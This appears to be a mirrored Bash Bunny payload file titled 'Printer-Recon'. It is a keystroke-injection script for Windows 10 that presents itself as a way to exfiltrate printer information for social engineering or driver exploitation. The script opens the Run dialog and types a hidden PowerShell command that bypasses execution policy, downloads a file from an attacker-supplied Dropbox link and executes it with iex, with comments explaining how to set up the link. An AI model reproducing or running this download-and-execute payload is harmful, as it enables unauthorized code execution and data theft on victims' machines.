mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-10-29 16:58:25 +00:00
17 lines
668 B
Plaintext
17 lines
668 B
Plaintext
REM Title: Printer-Recon
|
|
|
|
REM Author: atomiczsec
|
|
|
|
REM Description: This payload is meant to exfiltrate printer information for further social engineering or driver explotation. Can also be used to find printer web interfaces on the network
|
|
|
|
REM Target: Windows 10
|
|
|
|
DELAY 2000
|
|
GUI r
|
|
DELAY 500
|
|
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl
|
|
ENTER
|
|
|
|
REM Remember to replace the link with your DropBox shared link for the intended file to download
|
|
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
|